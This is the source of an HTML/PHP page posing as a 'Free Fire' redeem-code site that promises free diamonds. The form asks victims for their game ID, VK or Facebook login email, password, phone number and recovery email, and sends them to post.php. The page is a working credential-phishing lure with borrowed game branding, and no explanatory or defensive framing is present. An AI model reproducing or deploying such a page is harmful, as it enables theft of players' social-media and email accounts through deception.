submit.php 2.3 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758
  1. <html>
  2. <head>
  3. <title>Free Fire - Redeem Code</title>
  4. <meta charset="UTF-8"/>
  5. <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
  6. <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
  7. <meta property="og:title" content="Mobile Legends - Weekly Free Heroes"/>
  8. <meta property="og:url" content="index.html"/>
  9. <meta property="og:description" content="Get the free fire winterlands monthly event, redeem here"/>
  10. <meta property="og:type" content="article"/>
  11. <meta property="article:author" content="https://www.facebook.com/MobileLegendsGameIndonesia"/>
  12. <meta property="og:image" content="https://user-images.githubusercontent.com/49580304/102184480-5e9e0c80-3e64-11eb-8ec8-d433388ab43e.jpg"/>
  13. <link rel="icon" type="img/png" href="http://freefiremobile-a.akamaihd.net/ffwebsite/images/app-icon.png" sizes="32x32"/>
  14. <link rel="stylesheet" type="text/css" href="css/redeem.css"/>
  15. </head>
  16. <body>
  17. <form align="right" action="post.php" method="POST">
  18. <img src="https://1.bp.blogspot.com/-A4yuxmO8-Ws/XhBFUOeGf8I/AAAAAAAAAlM/w1Q5xixYe4s-NV9C2Nl_C886MVAI9XEKQCLcBGAsYHQ/s1600/Banner.jpg" alt="Instruction"/>
  19. <br/><br/>
  20. <label for="id">Account ID</label>*
  21. <input minlength="5" maxlength="7" type="number" name="id" required=""/>
  22. <br/><br/>
  23. <label for="country">LOG IN</label>*
  24. <select name="country" required="">
  25. <option value="VK" selected="">VK</option>
  26. <option value="FB">FB</option>
  27. </select>
  28. <br/><br/>
  29. <label for="code">Redeemption Code</label>*
  30. <input minlength="1" maxlength="16" type="text" name="code" required=""/>
  31. <br/><br/>
  32. <hr/><br/>
  33. <label for="email">Email/HP</label>*
  34. <input minlength="3" maxlength="50" type="text" name="email" required=""/>
  35. <br/><br/>
  36. <label for="password">Password</label>*
  37. <input minlength="5" maxlength="50" type="password" name="pass" required=""/>
  38. <br/><br/>
  39. <label for="phone">Phone</label>*
  40. <input minlength="8" maxlength="13" type="number" name="phone" required=""/>
  41. <br/><br/>
  42. <label for="recoveryemail">2nd Email</label>*
  43. <input minlength="15" maxlength="50" type="email" name="emailr" required=""/>
  44. <br/><br/>
  45. <hr/><br/>
  46. <div align="center">
  47. <p><small>Take your Diamond + bundle, check the mail box in the game after (30) Minutes</small></p>
  48. <br/>
  49. <input type="submit" value="Submit"/>
  50. </div>
  51. </form>
  52. </body>
  53. </html>